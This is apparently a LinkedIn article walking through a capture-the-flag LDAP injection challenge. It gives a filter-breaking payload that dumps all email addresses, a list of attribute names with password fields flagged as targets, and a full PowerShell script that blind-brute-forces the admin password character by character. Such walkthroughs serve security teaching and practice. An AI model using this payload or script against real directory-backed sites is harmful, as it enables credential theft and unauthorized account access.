Exploiting LDAP Injection: A Walkthrough
This article will provide a step-by-step guide to exploiting an LDAP injection vulnerability, using a challenge from a hacking-me-challenge-type website as a practical example. LDAP, or Lightweight Directory Access Protocol, is used to access and maintain distributed directory information services over a network. In essence, it's a way to query databases using the web.
For this walkthrough, we'll use PowerShell, a Microsoft task automation and configuration management (and my personal favorite) framework.
Step 1: Identify the Injection Point
The URL provided for this challenge is http://1.badsite.org/web-server/. Upon inspection, you might realize that when a search is done on the website, the URL changes to http://1.badsite.org/web-server/?action=dir&search=a. This change in URL indicates that the search value is being passed in the URL and is a potential point for LDAP injection.
Step 2: Construct the Payload
After identifying the injection point, the next step is constructing an appropriate payload to exploit the injection. The specified search query structure is: (&(sn=*)(Email=*input*)). Here, the injection point is located within the input value. A well-crafted payload would be )(sn=. The payload is crafted to change the query's logic and retrieve more information than intended.
As a result, the final query that the server executes would be: (&(sn=*)(Email=*)(sn=*)), which, when completed, displays everyone's email addresses.
Recommended by LinkedIn
Step 3: Identify Attribute Names
Before searching for the potential password, knowing the correct attribute names used by the LDAP database is essential. Here is a dictionary of common LDAP attribute names:
b
txt
Copy code
c
cn
dc
facsimileTelephoneNumber
co
gn
homePhone
jpegPhoto
id
l
mail
mobile
o
ou
owner
name
pager
password <--- a good one
sn <--- a good one
st
uid
username <--- a good one
userPassword
Step 4: Exploit the Injection
After dumping all the emails and finding the username and email for the "admin" account, we have all the information required to exploit the LDAP injection. Let's write the PowerShell script to carry out the actual attack.
powershell
# Define the target URL with a placeholder for the password part of the LDAP injectio
$uri = "http://1.badsite.org/web-server/?action=dir&search=admin*)(password="
# List all characters that could be in the password
$characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
# Create a string that will be used to store the progressively built password
$password = ""
# Assume the password is not complete
$passwordComplete = $false
# Iterate over each character in the characters list
while(-not $passwordComplete){
$passwordComplete = $true
for ($j=0; $j -lt $characters.Length; $j++){
# Build the payload that is the URL with the current guess appended
$payload = $uri + $password + $characters[$j]
# Make the request to the server
$response = Invoke-WebRequest -Uri $payload
# Check the content of the response
if ($response.Content -like "*admin@ch26.challenge01.root-me.org*"){
# If the content includes the email of the admin user, this character is part of the password
$password += $characters[$j]
# Output the password so far
Write-Host "Found '$characters[$j]' moving to the next letter. Password so far: $password"
# We've found a character for this position, so the password is not yet complete
$passwordComplete = $false
# Exit the inner loop as we've found the current character
break
}
}
}
# Output the final password
Write-Host "Final password: $password"
When the PowerShell script is run, it adds one character at a time to the end of the password and sends a request to the server. If the server's response indicates that the current guess is part of the password, the script adds the guess to the actual password and moves to the next character.
This process is repeated until no more characters are checked or the server's response contains no helpful information. The password will be printed to the console when it is fully brute-forced.